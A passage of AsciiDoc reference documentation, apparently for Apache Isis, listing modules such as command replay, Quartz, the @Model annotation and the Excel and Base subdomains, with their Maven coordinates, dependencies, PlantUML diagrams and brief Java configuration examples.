obtaining commands from a primary\n\n.Components\n****\no.a.i.extensions.commandreplay.primary.config.PrimaryConfig +\no.a.i.extensions.commandreplay.primary.spiimpl.CaptureResultOfCommand +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-config:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.core:isis-schema:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-command-log-jdo:jar:<managed> +\norg.apache.isis.mappings:isis-mappings-jaxrsclient-applib:jar:<managed> +\norg.apache.isis.mappings:isis-mappings-jaxrsclient-impl:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/commandreplay\/primary\/IsisModuleExtCommandReplayPrimary.adoc[IsisModuleExtCommandReplayPrimary], xref:refguide:extensions:index\/commandreplay\/primary\/config\/PrimaryConfig.adoc[PrimaryConfig], xref:refguide:extensions:index\/commandreplay\/primary\/mixins\/Object_openOnSecondary.adoc[Object_openOnSecondary], xref:refguide:extensions:index\/commandreplay\/primary\/restapi\/CommandRetrievalService.adoc[CommandRetrievalService], xref:refguide:extensions:index\/commandreplay\/primary\/ui\/CommandReplayOnPrimaryService.adoc[CommandReplayOnPrimaryService]\n****\n\n|Apache Isis Ext - Command Replay for Secondary\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-command-replay-secondary\nType: jar\nDirectory: \/extensions\/core\/command-replay\/secondary\n----\n|A module providing a Quartz Job to run on a secondary system,\nfor obtaining commands from a primary and saving them so that they are replayed.\n\n.Components\n****\no.a.i.extensions.commandreplay.secondary.analyser.CommandReplayAnalyserException +\no.a.i.extensions.commandreplay.secondary.analyser.CommandReplayAnalyserResult +\no.a.i.extensions.commandreplay.secondary.analysis.CommandReplayAnalysisService +\no.a.i.extensions.commandreplay.secondary.clock.TickingClockService +\no.a.i.extensions.commandreplay.secondary.config.SecondaryConfig +\no.a.i.extensions.commandreplay.secondary.executor.CommandExecutorServiceWithTime +\no.a.i.extensions.commandreplay.secondary.fetch.CommandFetcher +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-config:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.core:isis-schema:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-quartz-impl:jar:<managed> +\norg.apache.isis.mappings:isis-mappings-jaxrsclient-applib:jar:<managed> +\norg.apache.isis.mappings:isis-mappings-jaxrsclient-impl:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/commandreplay\/secondary\/IsisModuleExtCommandReplaySecondary.adoc[IsisModuleExtCommandReplaySecondary], xref:refguide:extensions:index\/commandreplay\/secondary\/SecondaryStatus.adoc[SecondaryStatus], xref:refguide:extensions:index\/commandreplay\/secondary\/analyser\/CommandReplayAnalyser.adoc[CommandReplayAnalyser], xref:refguide:extensions:index\/commandreplay\/secondary\/analyser\/CommandReplayAnalyserException.adoc[CommandReplayAnalyserException], xref:refguide:extensions:index\/commandreplay\/secondary\/analyser\/CommandReplayAnalyserResult.adoc[CommandReplayAnalyserResult], 
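\n****\n\nOn the secondary system the module is simply imported; SecondaryConfig (listed below) then carries the connection details for reaching the primary. A sketch (the property keys consumed by SecondaryConfig are not enumerated in this overview):\n\n[source,java]\n----\nimport org.springframework.context.annotation.Configuration;\nimport org.springframework.context.annotation.Import;\n\nimport org.apache.isis.extensions.commandreplay.secondary.IsisModuleExtCommandReplaySecondary;\n\n@Configuration\n@Import({\n        \/\/ pulls in the Quartz job (ReplicateAndReplayJob) that fetches\n        \/\/ commands from the primary and replays them locally\n        IsisModuleExtCommandReplaySecondary.class,\n})\npublic class SecondaryReplayModule {\n}\n----\n\n.Document Index Entries (continued)\n****\n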
xref:refguide:extensions:index\/commandreplay\/secondary\/analysis\/CommandReplayAnalysisService.adoc[CommandReplayAnalysisService], xref:refguide:extensions:index\/commandreplay\/secondary\/clock\/TickingClockService.adoc[TickingClockService], xref:refguide:extensions:index\/commandreplay\/secondary\/config\/SecondaryConfig.adoc[SecondaryConfig], xref:refguide:extensions:index\/commandreplay\/secondary\/executor\/CommandExecutorServiceWithTime.adoc[CommandExecutorServiceWithTime], xref:refguide:extensions:index\/commandreplay\/secondary\/fetch\/CommandFetcher.adoc[CommandFetcher], xref:refguide:extensions:index\/commandreplay\/secondary\/job\/ReplicateAndReplayJob.adoc[ReplicateAndReplayJob], xref:refguide:extensions:index\/commandreplay\/secondary\/job\/SecondaryStatusData.adoc[SecondaryStatusData], xref:refguide:extensions:index\/commandreplay\/secondary\/jobcallables\/ReplicateAndRunCommands.adoc[ReplicateAndRunCommands], xref:refguide:extensions:index\/commandreplay\/secondary\/mixins\/CommandJdo_exclude.adoc[CommandJdo_exclude], xref:refguide:extensions:index\/commandreplay\/secondary\/mixins\/CommandJdo_replayQueue.adoc[CommandJdo_replayQueue], xref:refguide:extensions:index\/commandreplay\/secondary\/mixins\/Object_openOnPrimary.adoc[Object_openOnPrimary], xref:refguide:extensions:index\/commandreplay\/secondary\/spi\/ReplayCommandExecutionController.adoc[ReplayCommandExecutionController], xref:refguide:extensions:index\/commandreplay\/secondary\/ui\/CommandReplayOnSecondaryService.adoc[CommandReplayOnSecondaryService]\n****\n|===\n\n=== Core: Model Annotation\n\n[plantuml,Core: Model Annotation,svg]\n----\n@startuml(id=Core:_Model_Annotation)\ntitle Core: Model Annotation - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Core: Model Annotation\\n[Software System]\" {\n rectangle \"==Apache Isis Ext - @Model\\n<size:10>[Container: packaging: jar]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Core: Model Annotation)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Ext - @Model\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-modelannotation\nType: jar\nDirectory: \/extensions\/core\/model-annotation\n----\n|Allows supporting methods to be annotated as @Model, to make explicit the bounds of the metamodel.\n\n.Components\n****\no.a.i.extensions.modelannotation.metamodel.services.IncubatorMetaModelPlugin +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/modelannotation\/applib\/IsisModuleIncModelApplib.adoc[IsisModuleIncModelApplib], xref:refguide:extensions:index\/modelannotation\/applib\/annotation\/Model.adoc[Model], xref:refguide:extensions:index\/modelannotation\/metamodel\/IsisModuleExtModelAnnotation.adoc[IsisModuleExtModelAnnotation], xref:refguide:extensions:index\/modelannotation\/metamodel\/facets\/SupportingMethodValidatorRefinerFactory.adoc[SupportingMethodValidatorRefinerFactory], 
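\n****\n\nIn practice the annotation marks a supporting method (hideXxx, disableXxx and so on) as deliberately part of the metamodel, so that the SupportingMethodValidatorRefinerFactory above can flag methods that support nothing. A minimal sketch; the package name is taken from the index entry path:\n\n[source,java]\n----\nimport org.apache.isis.extensions.modelannotation.applib.annotation.Model;\n\npublic class Customer {\n\n    public Customer updateName(final String name) {\n        \/\/ action implementation elided\n        return this;\n    }\n\n    \/\/ supporting method, explicitly declared to belong to the metamodel\n    @Model\n    public boolean hideUpdateName() {\n        return false;\n    }\n}\n----\n\n.Document Index Entries (continued)\n****\n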
xref:refguide:extensions:index\/modelannotation\/metamodel\/services\/IncubatorMetaModelPlugin.adoc[IncubatorMetaModelPlugin]\n****\n|===\n\n=== Core: Quartz\n\n[plantuml,Core: Quartz,svg]\n----\n@startuml(id=Core:_Quartz)\ntitle Core: Quartz - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Core: Quartz\\n[Software System]\" {\n rectangle \"==Apache Isis Ext - Quartz\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Ext - Quartz Impl\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n}\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (Core: Quartz)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Ext - Quartz\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-quartz\nType: pom\nDirectory: \/extensions\/core\/quartz\n----\n|Integrates Quartz\n\n|Apache Isis Ext - Quartz Impl\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-quartz-impl\nType: jar\nDirectory: \/extensions\/core\/quartz\/impl\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-config:jar:<managed> +\norg.apache.isis.core:isis-core-security:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-command-log-jdo:jar:<managed> +\norg.springframework.boot:spring-boot-starter-quartz:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/quartz\/IsisModuleExtQuartzImpl.adoc[IsisModuleExtQuartzImpl], xref:refguide:extensions:index\/quartz\/context\/JobExecutionData.adoc[JobExecutionData], xref:refguide:extensions:index\/quartz\/spring\/AutowiringSpringBeanJobFactory.adoc[AutowiringSpringBeanJobFactory]\n****\n|===\n\n=== Security: Secman\n\n=== Security: Shiro LDAP Realm\n\n=== RO Viewer: CORS\n\n=== Wicket Viewer: Excel Download\n\n=== Wicket Viewer: Full Calendar\n\n=== Wicket Viewer: Pdf.js\n\n== Subdomains\n\n[plantuml,Subdomains,svg]\n----\n@startuml(id=Subdomains)\ntitle Subdomains - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<11>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<12>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<9>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor 
#2E6295\n}\nskinparam rectangle<<10>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Subdomains\\n[Software System]\" {\n rectangle \"==Apache Isis Sub - Docx (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Sub - Docx (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Sub - Freemarker (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Sub - Freemarker (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Sub - Ognl (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<8>> as 8\n rectangle \"==Apache Isis Sub - Ognl (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<7>> as 7\n rectangle \"==Apache Isis Sub - PDF Box (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<10>> as 10\n rectangle \"==Apache Isis Sub - PDF Box (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<9>> as 9\n rectangle \"==Apache Isis Sub - Zip (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<12>> as 12\n rectangle \"==Apache Isis Sub - Zip (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<11>> as 11\n rectangle \"==Apache Isis Subdomains\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n3 .[#707070].> 4 : \"\"\n5 .[#707070].> 6 : \"\"\n7 .[#707070].> 8 : \"\"\n9 .[#707070].> 10 : \"\"\n11 .[#707070].> 12 : \"\"\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 7 : \"\"\n2 .[#707070].> 9 : \"\"\n2 .[#707070].> 11 : \"\"\n@enduml\n----\n.Projects\/Modules (Subdomains)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Subdomains\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains\nType: pom\nDirectory: \/subdomains\n----\n|A library of domain services and of supporting subdomains (often technical in nature), to be called from the\ncore domain of an Apache Isis applications.\n\n.Dependencies\n****\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis Sub - Docx (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-docx\nType: pom\nDirectory: \/subdomains\/docx\n----\n|Uses the Apache POI library for mail merge functions of .docx Word documents\n\n|Apache Isis Sub - Docx (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-docx-applib\nType: jar\nDirectory: \/subdomains\/docx\/applib\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n|Apache Isis Sub - Freemarker (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-freemarker\nType: pom\nDirectory: \/subdomains\/freemarker\n----\n|Integrates Freemarker Library\n\n|Apache Isis Sub - Freemarker (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-freemarker-applib\nType: jar\nDirectory: \/subdomains\/freemarker\/applib\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n|Apache Isis Sub - Ognl (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-ognl\nType: pom\nDirectory: \/subdomains\/ognl\n----\n|Integrates Ognl Library\n\n|Apache Isis Sub - Ognl (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-ognl-applib\nType: jar\nDirectory: 
\/subdomains\/ognl\/applib\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n|Apache Isis Sub - PDF Box (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-pdfbox\nType: pom\nDirectory: \/subdomains\/pdfbox\n----\n|Integrates PDF Box Library\n\n|Apache Isis Sub - PDF Box (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-pdfbox-applib\nType: jar\nDirectory: \/subdomains\/pdfbox\/applib\n----\n|Integrates PDF Box Library\n\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n|Apache Isis Sub - Zip (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-zip\nType: pom\nDirectory: \/subdomains\/zip\n----\n|A domain service for Apache Isis', for zipping utilities.\n\n|Apache Isis Sub - Zip (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-zip-applib\nType: jar\nDirectory: \/subdomains\/zip\/applib\n----\n|.Components\n****\no.a.i.extensions.zip.dom.impl.ZipService +\n****\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n|===\n\n=== Base\n\n[plantuml,Base,svg]\n----\n@startuml(id=Base)\ntitle Base - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Base\\n[Software System]\" {\n rectangle \"==Apache Isis Sub - Base (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Sub - Base (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (Base)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Sub - Base (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-base\nType: pom\nDirectory: \/subdomains\/base\n----\n|A module providing Base utilities for other subdomain modules\n\n|Apache Isis Sub - Base (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-base-applib\nType: jar\nDirectory: \/subdomains\/base\/applib\n----\n|.Components\n****\no.a.i.subdomains.base.applib.services.calendar.CalendarService +\n****\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.testing:isis-testing-unittestsupport-applib:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:subdomains:index\/base\/applib\/Chained.adoc[Chained], xref:refguide:subdomains:index\/base\/applib\/Dflt.adoc[Dflt], xref:refguide:subdomains:index\/base\/applib\/IsisModuleSubdomainsBaseApplib.adoc[IsisModuleSubdomainsBaseApplib], xref:refguide:subdomains:index\/base\/applib\/PowerType.adoc[PowerType], xref:refguide:subdomains:index\/base\/applib\/Titled.adoc[Titled], xref:refguide:subdomains:index\/base\/applib\/TitledEnum.adoc[TitledEnum], 
xref:refguide:subdomains:index\/base\/applib\/services\/BaseServicesModule.adoc[BaseServicesModule], xref:refguide:subdomains:index\/base\/applib\/services\/calendar\/CalendarService.adoc[CalendarService], xref:refguide:subdomains:index\/base\/applib\/types\/DescriptionType.adoc[DescriptionType], xref:refguide:subdomains:index\/base\/applib\/types\/FqcnType.adoc[FqcnType], xref:refguide:subdomains:index\/base\/applib\/types\/MoneyType.adoc[MoneyType], xref:refguide:subdomains:index\/base\/applib\/types\/NameType.adoc[NameType], xref:refguide:subdomains:index\/base\/applib\/types\/NotesType.adoc[NotesType], xref:refguide:subdomains:index\/base\/applib\/types\/ObjectIdentifierType.adoc[ObjectIdentifierType], xref:refguide:subdomains:index\/base\/applib\/types\/PercentageType.adoc[PercentageType], xref:refguide:subdomains:index\/base\/applib\/types\/ProperNameType.adoc[ProperNameType], xref:refguide:subdomains:index\/base\/applib\/types\/ReferenceType.adoc[ReferenceType], xref:refguide:subdomains:index\/base\/applib\/types\/TitleType.adoc[TitleType], xref:refguide:subdomains:index\/base\/applib\/types\/UrlTemplateType.adoc[UrlTemplateType], xref:refguide:subdomains:index\/base\/applib\/types\/UserNameType.adoc[UserNameType], xref:refguide:subdomains:index\/base\/applib\/types\/XxxType.adoc[XxxType], xref:refguide:subdomains:index\/base\/applib\/utils\/ClassUtils.adoc[ClassUtils], xref:refguide:subdomains:index\/base\/applib\/utils\/JodaPeriodUtils.adoc[JodaPeriodUtils], xref:refguide:subdomains:index\/base\/applib\/utils\/MathUtils.adoc[MathUtils], xref:refguide:subdomains:index\/base\/applib\/utils\/MessageUtils.adoc[MessageUtils], xref:refguide:subdomains:index\/base\/applib\/utils\/StringUtils.adoc[StringUtils], xref:refguide:subdomains:index\/base\/applib\/utils\/TitleBuilder.adoc[TitleBuilder], xref:refguide:subdomains:index\/base\/applib\/valuetypes\/AbstractInterval.adoc[AbstractInterval], xref:refguide:subdomains:index\/base\/applib\/valuetypes\/LocalDateInterval.adoc[LocalDateInterval], xref:refguide:subdomains:index\/base\/applib\/valuetypes\/VT.adoc[VT], xref:refguide:subdomains:index\/base\/applib\/with\/WithCodeComparable.adoc[WithCodeComparable], xref:refguide:subdomains:index\/base\/applib\/with\/WithCodeGetter.adoc[WithCodeGetter], xref:refguide:subdomains:index\/base\/applib\/with\/WithCodeUnique.adoc[WithCodeUnique], xref:refguide:subdomains:index\/base\/applib\/with\/WithDescriptionComparable.adoc[WithDescriptionComparable], xref:refguide:subdomains:index\/base\/applib\/with\/WithDescriptionGetter.adoc[WithDescriptionGetter], xref:refguide:subdomains:index\/base\/applib\/with\/WithDescriptionUnique.adoc[WithDescriptionUnique], xref:refguide:subdomains:index\/base\/applib\/with\/WithInterval.adoc[WithInterval], xref:refguide:subdomains:index\/base\/applib\/with\/WithIntervalContiguous.adoc[WithIntervalContiguous], xref:refguide:subdomains:index\/base\/applib\/with\/WithIntervalMutable.adoc[WithIntervalMutable], xref:refguide:subdomains:index\/base\/applib\/with\/WithNameComparable.adoc[WithNameComparable], xref:refguide:subdomains:index\/base\/applib\/with\/WithNameGetter.adoc[WithNameGetter], xref:refguide:subdomains:index\/base\/applib\/with\/WithNameUnique.adoc[WithNameUnique], xref:refguide:subdomains:index\/base\/applib\/with\/WithReferenceComparable.adoc[WithReferenceComparable], xref:refguide:subdomains:index\/base\/applib\/with\/WithReferenceGetter.adoc[WithReferenceGetter], 
xref:refguide:subdomains:index\/base\/applib\/with\/WithReferenceUnique.adoc[WithReferenceUnique], xref:refguide:subdomains:index\/base\/applib\/with\/WithSequence.adoc[WithSequence], xref:refguide:subdomains:index\/base\/applib\/with\/WithStartDate.adoc[WithStartDate], xref:refguide:subdomains:index\/base\/applib\/with\/WithTitleComparable.adoc[WithTitleComparable], xref:refguide:subdomains:index\/base\/applib\/with\/WithTitleGetter.adoc[WithTitleGetter], xref:refguide:subdomains:index\/base\/applib\/with\/WithTitleUnique.adoc[WithTitleUnique]\n****\n|===\n\n=== Excel\n\n[plantuml,Excel,svg]\n----\n@startuml(id=Excel)\ntitle Excel - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Excel\\n[Software System]\" {\n rectangle \"==Apache Isis Sub - Excel (Fixtures)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Sub - Excel (Integ Tests)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Sub - Excel (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Sub - Excel (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Sub - Excel (testing support)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n}\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 6 : \"\"\n@enduml\n----\n.Projects\/Modules (Excel)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Sub - Excel (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-excel\nType: pom\nDirectory: \/subdomains\/excel\n----\n|A domain service for Apache Isis', allowing collections\nof (view model) objects to be exported\/imported to\/from an\nExcel spreadsheet. 
Also support for excel-based fixtures.\n\n|Apache Isis Sub - Excel (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-excel-applib\nType: jar\nDirectory: \/subdomains\/excel\/applib\n----\n|.Components\n****\no.a.i.subdomains.excel.applib.dom.ExcelService +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\norg.apache.poi:poi-ooxml:jar:<managed> +\norg.apache.poi:poi-ooxml-schemas:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:subdomains:index\/excel\/applib\/IsisModuleSubdomainsExcelApplib.adoc[IsisModuleSubdomainsExcelApplib], xref:refguide:subdomains:index\/excel\/applib\/dom\/AggregationType.adoc[AggregationType], xref:refguide:subdomains:index\/excel\/applib\/dom\/ExcelMetaDataEnabled.adoc[ExcelMetaDataEnabled], xref:refguide:subdomains:index\/excel\/applib\/dom\/ExcelService.adoc[ExcelService], xref:refguide:subdomains:index\/excel\/applib\/dom\/HyperLink.adoc[HyperLink], xref:refguide:subdomains:index\/excel\/applib\/dom\/PivotColumn.adoc[PivotColumn], xref:refguide:subdomains:index\/excel\/applib\/dom\/PivotDecoration.adoc[PivotDecoration], xref:refguide:subdomains:index\/excel\/applib\/dom\/PivotRow.adoc[PivotRow], xref:refguide:subdomains:index\/excel\/applib\/dom\/PivotValue.adoc[PivotValue], xref:refguide:subdomains:index\/excel\/applib\/dom\/RowHandler.adoc[RowHandler], xref:refguide:subdomains:index\/excel\/applib\/dom\/WorksheetContent.adoc[WorksheetContent], xref:refguide:subdomains:index\/excel\/applib\/dom\/WorksheetSpec.adoc[WorksheetSpec], xref:refguide:subdomains:index\/excel\/applib\/dom\/util\/AnnotationList.adoc[AnnotationList], xref:refguide:subdomains:index\/excel\/applib\/dom\/util\/AnnotationTriplet.adoc[AnnotationTriplet], xref:refguide:subdomains:index\/excel\/applib\/dom\/util\/ExcelFileBlobConverter.adoc[ExcelFileBlobConverter], xref:refguide:subdomains:index\/excel\/applib\/dom\/util\/ExcelServiceImpl.adoc[ExcelServiceImpl], xref:refguide:subdomains:index\/excel\/applib\/dom\/util\/Mode.adoc[Mode], xref:refguide:subdomains:index\/excel\/applib\/dom\/util\/PivotUtils.adoc[PivotUtils], xref:refguide:subdomains:index\/excel\/applib\/dom\/util\/SheetPivoter.adoc[SheetPivoter]\n****\n\n|Apache Isis Sub - Excel (Fixtures)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-excel-fixtures\nType: jar\nDirectory: \/subdomains\/excel\/fixture\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jdo:pom:<managed> +\norg.apache.isis.subdomains:isis-subdomains-excel-applib:jar:<managed> +\norg.apache.isis.subdomains:isis-subdomains-excel-testing:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis Sub - Excel (Integ Tests)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-excel-integtests\nType: jar\nDirectory: \/subdomains\/excel\/integtests\n----\n|.Dependencies\n****\norg.apache.isis.mavendeps:isis-mavendeps-integtests:pom:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jdo:pom:<managed> +\norg.apache.isis.subdomains:isis-subdomains-excel-fixtures:jar:<managed> 
